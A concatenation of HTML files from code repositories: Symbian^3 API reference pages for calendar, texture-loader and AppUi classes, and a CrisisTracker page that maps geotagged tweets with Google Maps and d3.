SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?splar/core/util/hypergraphs/package-use.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
pdk/guid-6013a680-57f9-415b-8851-c4fa63356636/class_m_calendar_engine_commands_interface.html
warlordh/fork_Symbian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>TB9.2 Example Applications: MCalendarEngineCommandsInterface Class Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> <link type="text/css" rel="stylesheet" href="../css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="../css/sdl.css" media="screen"/> <!--[if IE]> <link href="../css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> </head> <body class="kernelguide"> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Product Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <!-- Generated by Doxygen 1.6.2 --> <div class="contents"> <h1>MCalendarEngineCommandsInterface Class Reference</h1><!-- doxytag: class="MCalendarEngineCommandsInterface" --> <p>Inherited by <a class="el" href="class_c_calendar_a_p_iexample_engine.html">CCalendarAPIexampleEngine</a>.</p> <p><a href="class_m_calendar_engine_commands_interface-members.html">List of all members.</a></p> <table border="0" cellpadding="0" cellspacing="0"> <tr><td colspan="2"><h2>Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a74a8f35615871a76d2ddbff5e002b81f"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::DoSearchL" ref="a74a8f35615871a76d2ddbff5e002b81f" args="(const TSearchType &amp;aType)=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>DoSearchL</b> (const TSearchType &amp;aType)=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac6177af8b9066dee5d2f6f3664bb9b17"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::DoAddL" ref="ac6177af8b9066dee5d2f6f3664bb9b17" args="()=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>DoAddL</b> ()=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8050e76488cc3ba6e5a675f8d383a7c8"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::DoSaveL" ref="a8050e76488cc3ba6e5a675f8d383a7c8" args="()=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>DoSaveL</b> ()=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af6cbbc7ee43bf39a5ebd6f1b2315d225"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::CreateEntryForModificationL" ref="af6cbbc7ee43bf39a5ebd6f1b2315d225" args="(TBool &amp;aModify)=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>CreateEntryForModificationL</b> (TBool &amp;aModify)=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae147c52cc3292e98aa91734ff8e3b52d"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::EntryCount" ref="ae147c52cc3292e98aa91734ff8e3b52d" args="() const =0" --> virtual TInt&nbsp;</td><td class="memItemRight" valign="bottom"><b>EntryCount</b> () const =0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae78f01e309442e30080e40543ebcd0bc"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::DeleteEntryL" ref="ae78f01e309442e30080e40543ebcd0bc" args="(const TInt &amp;aIndex)=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>DeleteEntryL</b> (const TInt &amp;aIndex)=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a92a06387e48853f43228a11d49c9241b"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::ExecuteDeletionL" ref="a92a06387e48853f43228a11d49c9241b" args="()=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>ExecuteDeletionL</b> ()=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a189cba3fc18a12b6cd1b2ffc630f8602"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::Entry" ref="a189cba3fc18a12b6cd1b2ffc630f8602" args="(const TInt &amp;aIndex)=0" --> virtual <a class="el" href="class_c_cal_helper_entry.html">CCalHelperEntry</a> &amp;&nbsp;</td><td class="memItemRight" valign="bottom"><b>Entry</b> (const TInt &amp;aIndex)=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aea5c442cfef72e3d71260d341b7d059f"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::SetModifyIndex" ref="aea5c442cfef72e3d71260d341b7d059f" args="(const TInt &amp;aIndex)=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>SetModifyIndex</b> (const TInt &amp;aIndex)=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a5b2bcf611a14f100f6cba3c56adff56c"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::ModifyIndex" ref="a5b2bcf611a14f100f6cba3c56adff56c" args="() const =0" --> virtual TInt&nbsp;</td><td class="memItemRight" valign="bottom"><b>ModifyIndex</b> () const =0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a75db390a5e9688cdbf7a14a18e2bd6c1"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::SetValuesToNewEntry" ref="a75db390a5e9688cdbf7a14a18e2bd6c1" args="(const TDesC &amp;aName, const TDateTime &amp;aDate, const TBool &amp;aAlarm, const TDateTime &amp;aAlarmTime, const TInt &amp;aSynchronizationMethod)=0" --> virtual TBool&nbsp;</td><td class="memItemRight" valign="bottom"><b>SetValuesToNewEntry</b> (const TDesC &amp;aName, const TDateTime &amp;aDate, const TBool &amp;aAlarm, const TDateTime &amp;aAlarmTime, const TInt &amp;aSynchronizationMethod)=0</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a1978f51d2d34938839e2a3af908e1561"></a><!-- doxytag: member="MCalendarEngineCommandsInterface::GetValuesToSet" ref="a1978f51d2d34938839e2a3af908e1561" args="(TDes &amp;aName, TTime &amp;aDate, TBool &amp;aAlarm, TTime &amp;aAlarmTime, TInt &amp;aSync)=0" --> virtual void&nbsp;</td><td class="memItemRight" valign="bottom"><b>GetValuesToSet</b> (TDes &amp;aName, TTime &amp;aDate, TBool &amp;aAlarm, TTime &amp;aAlarmTime, TInt &amp;aSync)=0</td></tr> </table> <hr/><a name="_details"></a><h2>Detailed Description</h2> <p>Definition at line <a class="el" href="_calendar_a_p_iexample_engine_8h_source.html#l00041">41</a> of file <a class="el" href="_calendar_a_p_iexample_engine_8h_source.html">CalendarAPIexampleEngine.h</a>.</p> </div> <hr size="1"/><address style="text-align: right;"><small>Generated by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.2 </small></address> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
Web/geotweets.html
JakobRogstadius/CrisisTracker
<!DOCTYPE html> <html> <head> <meta name="viewport" content="initial-scale=1.0, user-scalable=no"> <meta charset="utf-8"> <script src="https://maps.googleapis.com/maps/api/js?v=3.exp&sensor=false"></script> <link href="lib/reset/reset.css" rel="stylesheet" type="text/css" /> <link href="common.css" rel="stylesheet" type="text/css" /> <style> html, body, #map-canvas { height: 100%; margin: 0px; padding: 0px } #left-col { height: 100%; width: 49%; float: left; } #right-col { height: 100%; width: 49%; float: right; overflow: scroll; } #tweetlist { padding: 0; margin: 0 10px 10px 0; } #tweetlist td { padding: 3px; margin: 0; border-bottom: 1px dotted #ccc; } #tweetlist .timestamp { width: 110px; } #tweetlist .title { } #tweetlist .is-top-tweet .timestamp { font-style: italic; } h1 { margin-top: 10px; text-transform: uppercase; font-weight: bold; color: #444; font-size: 24px; margin-bottom: 0.6em; line-height: 28px; } b { font-weight: bold; } </style> <script src="lib/d3/d3.v3.min.js"></script> <script src="src/Globals.js"></script> <script> //CONFIGURATION var mapCenter = new google.maps.LatLng(0, 0); var mapZoomLevel = 1; var map; var geocoder; var markers = []; var userMarker; var queryIsRunning = false; function reloadOverview() { deleteMarkers(); var data; d3.json("api/get_map_summary.php", function(error, json) { if (error) return console.warn(error); data = json; data.forEach(addMarker); showMarkers(); }); } function reloadTweetList(query) { console.log("query is: " + query); var data; d3.json("api/get_novel_tweets.php?text=" + encodeURIComponent(query), function(error, json) { if (error) return console.warn(error); data = json; var li = d3.select("#title").text(query); var tr = d3.select("#tweetlist").selectAll("tr").remove(); var tr = d3.select("#tweetlist").selectAll("tr") .data(data) .enter().append("tr"); tr.classed("is-top-tweet", function(d) { return d.retweet_count > 0; }); tr.append("td") .text(function(d) { return Globals.getShortTime2(d.created_at); }) .classed("timestamp", true) .attr('title', function(d) { return d.retweet_count > 0 ? "This post has been retweeted " + d.retweet_count + " times." : ""; }); tr.append("td").append("a") .attr('href', function(d) { return 'http://twitter.com/' + d.user_screen_name + '/status/' + d.tweet_id; }) .attr('target', '_blank') .text(function(d) { return d.text; }) .classed("title", true); queryIsRunning = false; }); } function initializeMap() { var mapOptions = { zoom: mapZoomLevel, center: mapCenter, mapTypeId: google.maps.MapTypeId.TERRAIN }; map = new google.maps.Map(document.getElementById('map-canvas'), mapOptions); google.maps.event.addListener(map,'click',function(event) { codeLatLng(event.latLng); }); geocoder = new google.maps.Geocoder(); reloadOverview(); } // Add a marker to the map and push to the array. function addMarker(data) { var location = new google.maps.LatLng(data.latitude,data.longitude); var marker = new google.maps.Marker({ position: location, map: map, title: data.summary }); markers.push(marker); google.maps.event.addListener(marker,'click',function() { reloadTweetList(data.place_name); }); } // Sets the map on all markers in the array. function setAllMap(map) { for (var i = 0; i < markers.length; i++) { markers[i].setMap(map); } } // Removes the markers from the map, but keeps them in the array. function clearMarkers() { setAllMap(null); } // Shows any markers currently in the array. function showMarkers() { setAllMap(map); } // Deletes all markers in the array by removing references to them. function deleteMarkers() { clearMarkers(); markers = []; } //Reverse geocoding function codeLatLng(latLng) { if (queryIsRunning) { console.log("Patience..."); return; } queryIsRunning = true; geocoder.geocode({'latLng': latLng}, function(results, status) { if (status == google.maps.GeocoderStatus.OK) { if (results[1]) { var locname = results[1].address_components[0].short_name; if (userMarker) userMarker.setMap(null); userMarker = new google.maps.Marker({ position: results[1].geometry.location, map: map, title: locname }); reloadTweetList(locname); } else { console.log('No results found'); } } else { console.log('Geocoder failed due to: ' + status); } }); } google.maps.event.addDomListener(window, 'load', initializeMap); </script> </head> <body> <div id="left-col"> <div id="map-canvas"></div> </div> <div id="right-col"> <h1 id="title">Geosearch</h1> <table id="tweetlist"><tr><td> <b>Instructions</b> <br/>- Each map marker represents a suggested place name of importance. Click a marker on the map to show tweets relevant to that location. <br/>- Click the map directly to search for tweets mentioning other place names. </td></tr></table> </div> </body> </html>
sdk/GUID-20CDF0DD-12B6-325F-82DF-8111BC531046.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="MFsTextureLoaderObserver" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-20CDF0DD-12B6-325F-82DF-8111BC531046" /> <title> MFsTextureLoaderObserver </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-20CDF0DD-12B6-325F-82DF-8111BC531046"> <a name="GUID-20CDF0DD-12B6-325F-82DF-8111BC531046"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> MFsTextureLoaderObserver Class Reference </h1> <table class="signature"> <tr> <td> class MFsTextureLoaderObserver </td> </tr> </table> <div class="section"> <div> <p> <a href="GUID-20CDF0DD-12B6-325F-82DF-8111BC531046.html#GUID-20CDF0DD-12B6-325F-82DF-8111BC531046"> MFsTextureLoaderObserver </a> Texture loader observer </p> </div> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-B018598A-A409-3CF9-9823-355044EEA5C2"> DefaultTimeOut </a> ( <a href="GUID-EEC5813B-4C9F-323B-BCD6-1BB1A08D0B8C.html"> TTimeIntervalMicroSeconds32 </a> &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-85D22593-B712-32A9-B600-676221A2AD08"> Deleted </a> ( <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp;) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-FF5F4651-BC01-3474-9163-473C7B1E50E6"> FlagsUpdated </a> ( <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-9CFC3C3C-6C2A-3103-9EFB-162616716703"> PosUpdated </a> ( <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp;) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-50CCDF14-BB3B-3E2D-AE58-1FCE7B19D8B5"> SizeUpdated </a> ( <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-F8E6A38D-ED51-38DC-936B-13F314A98ED1"> TimerExpiredL </a> ( <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp;) </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Member Functions Documentation </h1> <div class="nested1" id="GUID-B018598A-A409-3CF9-9823-355044EEA5C2"> <a name="GUID-B018598A-A409-3CF9-9823-355044EEA5C2"> <!-- --> </a> <h2 class="topictitle2"> DefaultTimeOut(TTimeIntervalMicroSeconds32 &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> DefaultTimeOut </td> <td> ( </td> <td> <a href="GUID-EEC5813B-4C9F-323B-BCD6-1BB1A08D0B8C.html"> TTimeIntervalMicroSeconds32 </a> &amp; </td> <td> aTimeOut </td> <td> ) </td> <td> [pure virtual] </td> </tr> </table> <div class="section"> <div> <p> Loader timeout </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-EEC5813B-4C9F-323B-BCD6-1BB1A08D0B8C.html"> TTimeIntervalMicroSeconds32 </a> &amp; aTimeOut </td> <td> Timeout in microseconds as return value </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-85D22593-B712-32A9-B600-676221A2AD08"> <a name="GUID-85D22593-B712-32A9-B600-676221A2AD08"> <!-- --> </a> <h2 class="topictitle2"> Deleted(CFsTexture &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> Deleted </td> <td> ( </td> <td> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; </td> <td> aTexture </td> <td> ) </td> <td> [pure virtual] </td> </tr> </table> <div class="section"> <div> <p> Texture destroyed </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; aTexture </td> <td> Texture reference </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-FF5F4651-BC01-3474-9163-473C7B1E50E6"> <a name="GUID-FF5F4651-BC01-3474-9163-473C7B1E50E6"> <!-- --> </a> <h2 class="topictitle2"> FlagsUpdated(CFsTexture &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> FlagsUpdated </td> <td> ( </td> <td> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; </td> <td> aTexture </td> <td> ) </td> <td> [pure virtual] </td> </tr> </table> <div class="section"> <div> <p> Flags updated </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; aTexture </td> <td> Texture reference </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-9CFC3C3C-6C2A-3103-9EFB-162616716703"> <a name="GUID-9CFC3C3C-6C2A-3103-9EFB-162616716703"> <!-- --> </a> <h2 class="topictitle2"> PosUpdated(CFsTexture &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> PosUpdated </td> <td> ( </td> <td> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; </td> <td> aTexture </td> <td> ) </td> <td> [pure virtual] </td> </tr> </table> <div class="section"> <div> <p> Texture position updated </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; aTexture </td> <td> Texture reference </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-50CCDF14-BB3B-3E2D-AE58-1FCE7B19D8B5"> <a name="GUID-50CCDF14-BB3B-3E2D-AE58-1FCE7B19D8B5"> <!-- --> </a> <h2 class="topictitle2"> SizeUpdated(CFsTexture &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> SizeUpdated </td> <td> ( </td> <td> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; </td> <td> aTexture </td> <td> ) </td> <td> [pure virtual] </td> </tr> </table> <div class="section"> <div> <p> Size updated </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; aTexture </td> <td> Texture reference </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-F8E6A38D-ED51-38DC-936B-13F314A98ED1"> <a name="GUID-F8E6A38D-ED51-38DC-936B-13F314A98ED1"> <!-- --> </a> <h2 class="topictitle2"> TimerExpiredL(CFsTexture &amp;) </h2> <table class="signature"> <tr> <td> void </td> <td> TimerExpiredL </td> <td> ( </td> <td> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; </td> <td> aTexture </td> <td> ) </td> <td> [pure virtual] </td> </tr> </table> <div class="section"> <div> <p> TimerExpiredL </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-DFE7AF8D-B486-3174-9EE2-51DCE860B5B5.html"> CFsTexture </a> &amp; aTexture </td> <td> Texture reference </td> </tr> </table> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="concept" /> <meta name="DC.Title" content="Application user interface (AppUi)" /> <meta name="DC.Relation" scheme="URI" content="GUID-6C16417B-5B37-5310-B59A-750D971AA6D4.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-971C9B81-1D6F-59E7-9416-385A0787D642.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-06676D89-FDE7-58FD-9D2E-3C984CD24BAC.html" /> <meta name="DC.Relation" scheme="URI" content="index.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-32E29020-1956-461A-B79A-1492E06049E7.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-94005A46-B4C6-4A30-A8E8-1B9C2D583D50.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-E079315A-E5B6-4D33-B7E3-88697A3F11A4.html" /> <meta name="DC.Relation" scheme="URI" content="GUID-6C16417B-5B37-5310-B59A-750D971AA6D4.html" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA" /> <meta name="DC.Language" content="en" /> <link rel="stylesheet" type="text/css" href="commonltr.css" /> <title> Application user interface (AppUi) </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <link rel="stylesheet" type="text/css" href="nokiacxxref.css" /> </head> <body id="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA"> <a name="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2470542 id2469732 id2469004 id2468931 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; <a href="GUID-32E29020-1956-461A-B79A-1492E06049E7.html" title="The Symbian Guide describes the architecture and functionality of the platform, and provides guides on using its APIs."> Symbian Guide </a> &gt; <a href="GUID-94005A46-B4C6-4A30-A8E8-1B9C2D583D50.html"> Classic UI Guide </a> &gt; <a href="GUID-E079315A-E5B6-4D33-B7E3-88697A3F11A4.html"> Control and animation framework </a> &gt; <a href="GUID-6C16417B-5B37-5310-B59A-750D971AA6D4.html"> The UI Control Framework (CONE) </a> &gt; </div> <h1 class="topictitle1"> Application user interface (AppUi) </h1> <div> <p> Cone provides the <a href="GUID-3AC2CDAC-0291-309F-A020-049BC9F2CF90.html"> <span class="apiname"> CCoeAppUi </span> </a> class as a generic base for application user interface development. Uikon provides a specialization, <a href="GUID-1185F595-0488-3E93-8D60-6B3A1A3AC32E.html"> <span class="apiname"> CEikAppUi </span> </a> , from which concrete application UIs can be derived. UI variant libraries typically derive their own AppUi base class from <a href="GUID-1185F595-0488-3E93-8D60-6B3A1A3AC32E.html"> <span class="apiname"> CEikAppUi </span> </a> to standardize common UI paradigms. <a href="GUID-3AC2CDAC-0291-309F-A020-049BC9F2CF90.html"> <span class="apiname"> CCoeAppUi </span> </a> is, therefore, normally a 'long way' from the surface of the finished application and knows little of the concrete controls or functionality that it contains. </p> <p> <a href="GUID-3AC2CDAC-0291-309F-A020-049BC9F2CF90.html"> <span class="apiname"> CCoeAppUi </span> </a> provides the following key functionality: </p> <ul> <li id="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA__GUID-96F849A2-4022-5564-8A28-A8D3615304CF"> <a name="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA__GUID-96F849A2-4022-5564-8A28-A8D3615304CF"> <!-- --> </a> <p> An event-handling framework </p> <p> <a href="GUID-3AC2CDAC-0291-309F-A020-049BC9F2CF90.html"> <span class="apiname"> CCoeAppUi </span> </a> is the at the top of the run-time control hierarchy. It is the point at which key-press events are received from the Window Server. Many of the event-handling functions are virtual and implemented in the derived AppUi classes. </p> </li> </ul> <div class="fignone" id="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA__GUID-9FC56BFC-6DF5-5BF8-BDCD-65579655C558"> <a name="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA__GUID-9FC56BFC-6DF5-5BF8-BDCD-65579655C558"> <!-- --> </a> <img src="GUID-59A9871D-B0F3-54E2-A5BA-38790C109797_d0e47289_href.png" /> </div> <ul> <li id="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA__GUID-380D267D-F442-5AE3-A361-CACEA4E97A88"> <a name="GUID-BBC374AD-88E6-5C58-88BB-B939C2948DDA__GUID-380D267D-F442-5AE3-A361-CACEA4E97A88"> <!-- --> </a> <p> View Management </p> <p> The View Manager ( <a href="GUID-1444A0B4-8828-3EEB-8DC7-C331648A5201.html"> <span class="apiname"> CCoeViewManager </span> </a> ) is encapsulated by <a href="GUID-3AC2CDAC-0291-309F-A020-049BC9F2CF90.html"> <span class="apiname"> CCoeAppUi </span> </a> which provides a view management API. </p> <p> Views are concrete classes that implement the <a 